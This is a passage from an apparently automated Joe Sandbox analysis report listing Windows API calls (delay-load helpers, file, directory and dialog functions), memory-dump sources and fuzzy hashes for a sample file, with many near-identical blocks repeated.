                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 1a85ddd33a73974083bed69e728fe122dae94ea5a57870bde1d1745383ad6992
                                                                  • Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
                                                                  • Opcode Fuzzy Hash: 1a85ddd33a73974083bed69e728fe122dae94ea5a57870bde1d1745383ad6992
                                                                  • Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: a1fe3b340d30764793fce99c28aea32f3d5b721de3051b6625a8fa08670c550e
                                                                  • Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
                                                                  • Opcode Fuzzy Hash: a1fe3b340d30764793fce99c28aea32f3d5b721de3051b6625a8fa08670c550e
                                                                  • Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 68b50b2cdc5913d791b3effcd40dc1c67a469c4191e184938e6f585448aa60dc
                                                                  • Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
                                                                  • Opcode Fuzzy Hash: 68b50b2cdc5913d791b3effcd40dc1c67a469c4191e184938e6f585448aa60dc
                                                                  • Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: aa9514fa592a8be745b50a8bb397f526d009a46f4415c66f5d1d96de1552c14f
                                                                  • Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
                                                                  • Opcode Fuzzy Hash: aa9514fa592a8be745b50a8bb397f526d009a46f4415c66f5d1d96de1552c14f
                                                                  • Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 6c8fed27197bbc21c50c03f959084eca04c9db63a48e1e32ca5b0fbc227dbb2d
                                                                  • Instruction ID: 044871182b1f52025d6b3745ef7d68a1cc9928a9773c23a182ebad8fb093c495
                                                                  • Opcode Fuzzy Hash: 6c8fed27197bbc21c50c03f959084eca04c9db63a48e1e32ca5b0fbc227dbb2d
                                                                  • Instruction Fuzzy Hash: 22A001E62AA1D2BC32186256AD47E3B121DC4C6B65334996EF816954D1A88028466876
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 6dc4265e61829061ace338b5c1d1bc52fcbae35e181000a93448c0ffa4682e55
                                                                  • Instruction ID: 06df7a541ba0d0abfc4a5481f0a27e87c3c6e972da61af124abc49f64c10e235
                                                                  • Opcode Fuzzy Hash: 6dc4265e61829061ace338b5c1d1bc52fcbae35e181000a93448c0ffa4682e55
                                                                  • Instruction Fuzzy Hash: 5EA001D66AA192BC3108A2A7AD86E3B122DC4C6B69331992EF816854C1A89818566971
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 17be6f579c796bb566e87dbedcdcd01c0c3f869179a5b38a02d605a290bc1c84
                                                                  • Instruction ID: 06df7a541ba0d0abfc4a5481f0a27e87c3c6e972da61af124abc49f64c10e235
                                                                  • Opcode Fuzzy Hash: 17be6f579c796bb566e87dbedcdcd01c0c3f869179a5b38a02d605a290bc1c84
                                                                  • Instruction Fuzzy Hash: 5EA001D66AA192BC3108A2A7AD86E3B122DC4C6B69331992EF816854C1A89818566971
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 0a99c80d7b5baac16e2e8c7132f5c4dcf05e7f126e9e39f2081c1096504f1632
                                                                  • Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
                                                                  • Opcode Fuzzy Hash: 0a99c80d7b5baac16e2e8c7132f5c4dcf05e7f126e9e39f2081c1096504f1632
                                                                  • Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 4af2c91271b548c6d28b22eca341f12b2e7f28f1db2e6afdc5e1d6cecccb17c3
                                                                  • Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
                                                                  • Opcode Fuzzy Hash: 4af2c91271b548c6d28b22eca341f12b2e7f28f1db2e6afdc5e1d6cecccb17c3
                                                                  • Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 98b42497ba9d21dc00f767deac12fea8352952345501ad445b9177ccf130a483
                                                                  • Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
                                                                  • Opcode Fuzzy Hash: 98b42497ba9d21dc00f767deac12fea8352952345501ad445b9177ccf130a483
                                                                  • Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: bfa979e46bf353a89b8a7cb860c691796603a3829d157aa3b60677eb0d5d7c5b
                                                                  • Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
                                                                  • Opcode Fuzzy Hash: bfa979e46bf353a89b8a7cb860c691796603a3829d157aa3b60677eb0d5d7c5b
                                                                  • Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: cfe51c618d0a00607b4113bcded4ead97ffca831c5841706b1efaf38ced9de99
                                                                  • Instruction ID: ee5febf9142093c6cff641860a994317ad7690ac67a332b6813806ca3a2063be
                                                                  • Opcode Fuzzy Hash: cfe51c618d0a00607b4113bcded4ead97ffca831c5841706b1efaf38ced9de99
                                                                  • Instruction Fuzzy Hash: ABA011C22AA0803C3008A2A3AC82E3B022CC0C2B2A330822EF800800C0A88808022830
                                                                  APIs
                                                                  • SetEndOfFile.KERNELBASE(?,00CB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CB9F0C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File
                                                                  • String ID:
                                                                  • API String ID: 749574446-0
                                                                  • Opcode ID: bdf5c8343346f8e45be7193e083623e3c4839d7da8be6bc2f30656ae49512867
                                                                  • Instruction ID: ee2e3d6d74d5f8deafed2bb4edd016feef608809fbde6e7d95c4a67d57e8dd42
                                                                  • Opcode Fuzzy Hash: bdf5c8343346f8e45be7193e083623e3c4839d7da8be6bc2f30656ae49512867
                                                                  • Instruction Fuzzy Hash: 00A0223008008E8BCE202B30CE0C30C3B20FB20BC030002E8A00BCF0B2CB238A0BCB20
                                                                  APIs
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,00CCAE72,C:\Users\user\Desktop,00000000,00CF946A,00000006), ref: 00CCAC08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID:
                                                                  • API String ID: 1611563598-0
                                                                  • Opcode ID: b4aee65a142464a21a5bf226bda7e1d3c69505c1913c9b8b5fd50bac7b88644b
                                                                  • Instruction ID: 39b5ea0e63f1144aedca8946a2ac77987e9b34048fbb8e72ac15b1933450b169
                                                                  • Opcode Fuzzy Hash: b4aee65a142464a21a5bf226bda7e1d3c69505c1913c9b8b5fd50bac7b88644b
                                                                  • Instruction Fuzzy Hash: F9A011302002808B82000B328F8AB0EBAAAAFA2B00F02C038A00088030CB30C820AA00
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,00CB95D6,?,?,?,?,?,00CE2641,000000FF), ref: 00CB963B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 6b6f2a03b4ab1c87a6e4ed2d4a5a672041d025bde32a7d12615e5ee7cf6446ae
                                                                  • Instruction ID: e035c6283f5a975bc4305cb0bc14a75a7fec075d9be4d4f7a95e1478aa2e5ba3
                                                                  • Opcode Fuzzy Hash: 6b6f2a03b4ab1c87a6e4ed2d4a5a672041d025bde32a7d12615e5ee7cf6446ae
                                                                  • Instruction Fuzzy Hash: B9F0E270081B559FDB308A21C448BE2B7E8EB12321F040B1EE1F383AE0D7706B8D9A40
                                                                  APIs
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CCC2B1
                                                                  • EndDialog.USER32(?,00000006), ref: 00CCC2C4
                                                                  • GetDlgItem.USER32(?,0000006C), ref: 00CCC2E0
                                                                  • SetFocus.USER32(00000000), ref: 00CCC2E7
                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CCC321
                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CCC358
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CCC36E
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC38C
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC39C
